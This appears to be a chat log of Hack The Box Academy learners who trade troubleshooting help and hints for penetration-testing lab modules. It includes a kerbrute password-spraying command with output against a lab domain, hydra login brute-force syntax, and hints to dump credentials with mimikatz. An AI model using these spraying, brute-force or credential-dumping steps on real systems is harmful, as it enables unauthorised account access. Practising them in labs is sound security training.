    from ..core import output, extension, arg, controller, meta, cache, mail
  File "/home/kali/VirtualManagedTools/droopescan-venv/lib/python3.13/site-packages/cement/core/extension.py", line 8, in <module>
    from imp import reload # pragma: no cover
    ^^^^^^^^^^^^^^^^^^^^^^
ModuleNotFoundError: No module named 'imp'
```
no module named imp
sounds like the problem is right there
no module -> means that the python library isn't installed
what version of python though? any?
well it looks like the error is just related to 3.13 according to your venv
weird... I've set up multiple tools on venv environment with no issues. I found on reddit people having similar issues and it says droopescan isn't compatible with python3.13 and only works with python3.10
well your venv is 3.13
/home/kali/VirtualManagedTools/droopescan-venv/lib/python3.13/<--
so I should run this command - python3.10 -m venv <toolname-venv> ?
If my knowledge is correct, which I could be wrong. That will set up the environment for the tool you're trying to use. You'd then cd in to it, install the tool and use like normal
But you'll have to cd in to that .venv environment every time you want to use it. Not create it everytime, just CD in to that directory
hi guys, not related to modules but which option to go for VIP+ access I reckon they removed the regular VIP only option? I see there are three options but I'm only an individual so don't fit in the government, education or enterprise. Also, is there student discount like in academy?? I didn't find it while looking so i'm guessing it's only applicable to academy?
Yeah the student subscription only applies to Academy, they are different platforms with different subscriptions.
okay but which one does a regular person usually go with? It looks really pricey
Academy is for educational/learning. The labs are for practicing what you know.
yeah i get that my question is related to subscription option
People probably pick a subscription based on their own personal goals
Overall the value for the content you get blows other platforms out of the water. The student subscription on Academy is an incredible deal too.
is it 250 USD annually?
is what 250 annually
For regular HTB platform VIP+ access?
For the price of one 4 month course in my uni, i can get ~6 years worth of htb academy access (with the student deal) lmao
I use the student discount for monthly Academy and it is a very good deal.
Are other people having issues with images not loading in the modules? I tried the usual clear history, switch browsers, restart computer, etc but I’m getting the broken images symbol for them. I did submit a ticket.
For context I’m in Attacking Common Applications
If there's anyone willing to give me a hint for MSSQL, Exchange & SCCM Skills Assessment, I'd be happy. Stuck on Q4 trying to find the attack vector for the SCCM host. Thanks!
Can anyone help me with this? I can only connect to the windows attack host and not the linux attack host in this section. I have tried ssh and rdp
Hey guys, I was doing the module "FootPrinting", section "MSSQL". the first question Enumerate the target using the concepts taught in this section. List the hostname of MSSQL server. when I use NMAP v7.93 none of the MSSQL scripts are working :
NSE: [ms-sql-info 10.129.229.230] brandedVersion: 2005, #lookup: 5
NSE: [ms-sql-info 10.129.229.230] brandedVersion: 2019, #lookup: 29
NSE: Starting ms-sql-ntlm-info against 10.129.229.230:1433.
NSE: Starting ms-sql-dac against 10.129.229.230:1433.
NSE: Starting ms-sql-empty-password against 10.129.229.230:1433.
NSE: Starting ms-sql-info against 10.129.229.230:1433.
NSE: ms-sql-ntlm-info against 10.129.229.230:1433 threw an error!
attempt to index a nil value
stack traceback:
[C]: in for iterator 'for iterator'
/usr/bin/../share/nmap/nselib/mssql.lua:3334: in function </usr/bin/../share/nmap/nselib/mssql.lua:3327>
(...tail calls...)
NSE: ms-sql-dac against 10.129.229.230:1433 threw an error!
attempt to index a nil value
stack traceback:
[C]: in for iterator 'for iterator'
/usr/bin/../share/nmap/nselib/mssql.lua:3334: in function </usr/bin/../share/nmap/nselib/mssql.lua:3327>
(...tail calls...)
....
....
I did reset the box but still getting errors. Anyone know what's going on ?
Use pyenv. If you have any more questions dm me . I have solved the issue
dm
i am currently kind of stuck on the footprinting lab hard. is it recommended to keep trying until i get it or just leave it for now and come back later when i have more knowledge and done more modules?
Just finished both the updated SQL injection SA and File inclusion SA. Both are much more realistic and harder than the previous assessments though I really enjoyed both. Very nice!
where are you stuck?
was stuck at the initial foothold but i found it after a while
Hey guys I am currently studying introduction to networking modules.
I feel like there are alot of information and protocols mentioned and forgetting after i study or read them.
is it just me ?
Not going to lie you're going to forget them especially if you don't use them. I suggest doing some networking, anything from the ip command in linux systems to cisco packet tracer or other network simulators
yeh man
thanks for the advice!
Hi everyone, I'm stuck on Advanced XSS and CSRF Exploitation skills assessment, I'm on the last step of getting the flag, can someone dm please ? Thanks!
did anyone do the brute force http-post-form module?
why is the F not working here. every source tells me that it should fail if the string after F= is present but somehow it just succeeds on both Invalid and Invalid credentials
http-post-form "/:user=^USER^&pass=^PASS^:F=Invalid"
Hey I am unable to have access to the XSS - Phishing module practice. The module gives me the IP address but I never reach it
it isn't the first time this happened doing modules
anyone faced this issue when trying to use adalanche?
Module: DACL Attacks II
Section: Logon Scripts
i believe u dont need to type 'F=', just the raw failure string
anybody has a tip on file inclusion skill assessment ?
dm check
you can dm me if you still need help
In the Active Directory Enum and Attacks modules, the last question ask to find 'ObjectAceType of the first right that the forend user has over the GPO Management group' but the command Get-DomainObjectACL is running for a very very long time now and I don't know if I should wait or if i'm on the wrong path. But I think it is the right way
try -verbose
will output findings sooner
It is already in -Verbose 🙁
xD alright thanks 🙂
I have problem with vbn when iam install vbn to kali Linux replace machine of htb can't connect to target
@fathom pendant mage of the modules, do you have any idea why this is wrong?
wrong pw idk
Not sure if this is the right channel
But i just passed an exam i was worried about for a long time
And really benefited from the HTB Academy you guys are killing it with the content thank you so much
Found a easy way to get the answer in a second
Could not wait more than 45 minutes
Hello, I am trying to solve the skills assessment in the Incident Handling Process but I cannot login with the credentials provided to TheHive...
anyone recall having problems with these module??
Lads and lasses of HTB, need some help on Footprinting Lab - Easy. Google and searching through messages didn't help, hence I'm here.
FTP on both 21 and 2121 is empty for me, no hidden files too, even mget * .* does nothing. Anyone face this problem?
i believe there's creds you're given
Yeah, I succesfully logged in, but it's empty :(
No files there, not even hidden
On both ports
I thought maybe I just can't see them, so I tried to download everything with mget *. Still nothing O_o
ls -la should work
Tried that 😅
Only . and ..
They are supposed to be empty, look for another way to access them (maybe from another port)
Ok! 21 and 2121 didn't work, I'll try searching further
Thx for the lead 🫡
only one should be empty
Port 2121 is a proxy port right? No need to look for other ports
are you sure you spelled the name right?
@night hound i spawned a fresh target and got the expected result
Yeah :/
I'll try to respawn the target ig
Does anyone tend to have issues when trying to do a lab and the connection doesn't work when you are using HTB pwnbox and it automatically gives you an ip to use for the lab, but there is no connection to be established? Windows Fundamentals > NTFS vs. Share Permissions
Hello everyone, i have some problems with the module im working on can u help me?
There's no SMB port open, so you can't use smbclient. Just use RDP to answer the questions.
your way forward is the port 2121 using the creds
Cycle through VPN, it happens at times
even remmina doesn't work. I dont have firewall. Idk what's wrong. I don't want to use pwnbox because the box size sucks
like what even is this size
Are you using the pwnbox at the same time as the VPN?
You're not using the correct password, according to your 2nd screen shot
You're missing a ! at the end, and don't forget to wrap the password in single quotes.
No. I was trying to use my own machine first. Then tried pwnbox.
still the same
But your last screenshot showed the pwnbox spawned
Try shutting down the pwnbox, disconnect from the VPN. Change regions and servers on the VPN (use TCP VPN) and re-download the VPN. terminate the target, connect to the VPN, ctrl+f5 on the page, then respawn the target and wait 3-5 mins and try again.
That's the thing. I dont see any reason why it wouldn't work on my machine. Even remmina says can't connect
Hello. Please need help 😭. Can’t pass the Conditional Execution in the bash scripting module. My script is ok but the value I submit is incorrect. Could you help me guys?
you can dm
whoah 45 minutes is too much
what was that way though
dont tell me that its whats on my mind 💀
It worked. I was on a UDP vpn. Sorry if I sound ranty. I was just so annoyed 🙁
Thank you so much
pls anybody a hint on file inclusion skill assessment
I'm doing password spraying with kerbrute and ran into an issue
when I use a list with users I get an error
```
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1
__ __ __
/ /_____ / / _______ / /
/ //_/ _ / / __ / / / / / __/ _
/ ,< / __/ / / // / / / // / // __/
//||_// /.// _,/_/___/
Version: dev (9cfb81e) - 11/09/25 - Ronnie Flathers @ropnop
2025/11/09 15:18:04 > Using KDC(s):
2025/11/09 15:18:04 > 172.16.5.5:88
2025/11/09 15:18:04 > [!] bdavis@inlanefreight.local:Welcome1 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type
2025/11/09 15:18:04 > [!] adunn@inlanefreight.local:Welcome1 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type
```
but when I use a list with the user I know exists, it works
```
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 user Welcome1
__ __ __
/ /_____ / / _______ / /
/ //_/ _ / / __ / / / / / __/ _
/ ,< / __/ / / // / / / // / // __/
//||_// /.// _,/_/___/
Version: dev (9cfb81e) - 11/09/25 - Ronnie Flathers @ropnop
2025/11/09 15:18:09 > Using KDC(s):
2025/11/09 15:18:09 > 172.16.5.5:88
2025/11/09 15:18:09 > [+] VALID LOGIN: RealUser@inlanefreight.local:Welcome1
2025/11/09 15:18:09 > Done! Tested 1 logins (1 successes) in 0.009 seconds
```
Stuck on attacking thick applications. I can’t find the correct MAP Rw file. Pls help
That's a rough section. That box is the "Fatty" box on the Labs platform. I'd recommend watching Ippsec's video on Fatty if you're struggling with it.
Make sure your breakpoint is set properly
Replacing * by ‘GPO Group Management’. Btw I heard someone waiting for 1 hour before result pops
hi
i have an issue with the process injection and attacking module, i am not able to access the rdp
from the linux machine. i tried to reset the target machine several times as well as changing the academy vpn
nvm sorry
@heady sapphire underrated advice this. If there's a problem better not suffer alone
Can I make use of content from academy modules to post writeups? Specifically the commands used to get answers to the questions at the end of the section
Only for modules at tier 0, anything above that will be asked to be taken down or get you banned off the platform
Ah 
Hello mate! Using CrackMapExec Skill Q1: I've found the entire list of users, but is bruteforcing the only way to find the correct passwd, or is another way possible, and which list of passwd works? THX a lot!
Currently on the "Find cleartext credentials for another domain user. Submit the username as your answer." in "AD Enumeration & Attacks - Skills Assessment Part I"
I have had no trouble|| pivoting, RDP'ing and running mimikatz||. I have actually found a plaintext password ||(really long and complex but plaintext nonetheless)||. But it appears this is NOT the answer (neither associated user or PW). So a bit flummoxed for the moment. Will try and run some other stuff. Any light nudges in the meantime appreciated....
Try ||mimikatz|| again it’ll be there. Try the other modules like ||logonpasswords|| etc
Also it’s asking for the username
Thanks! Will keep trying!
I need both. I'm working on it right now. Thanks again! Got it! ||"Learning to Fly".... or "I'll Stand my Ground"..... -- showing my age there.....||
Good morning! I am doing Pass the Ticket from Linux from Password Attacks. Trying to do labs but provided credentials for SSH are not working, is that normal?
Nevermind, I got it 🙂
Hello, is this normal for RDP labs? It is slow as hell. I'm doing "The Live Engagement" assessment on Shell & Payloads
I tried tunneling via chisel to my real machine but connection refused. Is there any workaround on NOT using this foothold on the RDP? It's so slow
Hi everyone, what is the meaning of dumping in cracking password scenario?
are dumping password and dumping memory different things or the word "dumping" has the same goal?
i have a question on web attack blind data exfiltration. So like we can't really identify or detect the blind one right? we just have to have the XML and try some things, maybe like /etc/hosts or else, and if it fails then there is no vulnerability?
Prompt Injection Attacks is fucking amazing. So far a VERY FUN module to do.
I'm on the target machine of the "AD Enumeration & Attacks - Skills Assessment Part II" module. The machine keeps falling over/crashing. I have re-started it several times but it keeps crashing. Hard to make progress if the machine keeps dying. Anyone else with this problem?
can anyone help with this api attacks I'm stuck guys
Exploit another Unrestricted Resource Consumption vulnerability and submit the flag.
If i purchase HTB Academy Student version, will i have access to unlimited virtual machines?
i literally made the same mistake 😄 thinking the task is broken lol
yes
Can i dm u about Q3🙃
yeah for sure haha
Please help i still can't get past this for sql injection fundamental. How to bypass the login. Already try by attack payload but not working found password. Please give me a guide or hint.
look for other endpoints that may be fruitful
hi guys, any good articles or mini-guides for 101 on Docker? Going through Linux Fundamentals, but the info on the topic isn’t enough. Any good resources with practice? I mean not the hundred pages books but efficient practice oriented guide? Maybe some “do with me” project?
day 3 for asking help on file inclusion skill assessment
i need help with this plzz Attacking Thick Client Applications
Not sure I remember the SA much, but what is your question?
Also looking for help on the Web Attacks | Skills Assessment I cannot for the life of me get an injection to work. I have the proper injection point, but everything is failing.
can i dm ?
Sure
DACL Attacks - DACLs Overview Q3: Using dsacls.exe, what is the attribute that Pedro can edit for the user Rita? (Submit the attribute's full name, not its acronym.) I have the output ||SPECIAL ACCESS for Validated write to service principal name|| why isn't it working? Thanks
~~In the module : MSSQL, Exchange, and SCCM Attacks
In the SCCM section, the question Coerce PXE Boot and decrypt the password. What's the password for the PXE Boot?
Does anyone have a solution for not getting connectivity to the SQL host using the tool?
Tried resetting the lab multiple times, using different tools that allow the attack from linux after setting up a tunnel. Nothing seems to be working.~~
Switching to US VPN worked... zzz
Dumping is just retrieving stuff from whatever you're dumping from
Passwords can be stored in memory
Anyone able to DM me a nudge for NTLM Relay Attacks - Skill Assessments. I am stuck on Q3 regarding obtaining the password for the sqlftp account
Hi
Who can help me with CWEE path?
I am stuck at NoSQLI skill assessment ll
all good, forums has some nice help / hints
OMG I know everyone hates to read it but I have a 'Host seems down' issue on the starting point and I've tried EVERYTHING 😭😭 Someone help me I'm beggin
I've checked that my Kali firewall is disabled and that I only have 1 active openvpn connection. My ip also matches that on the HTB site, and still 'Host seems down'...
And yeah I tried switching to TCP and changing servers
are you using the 'starting point' vpn?
yeah
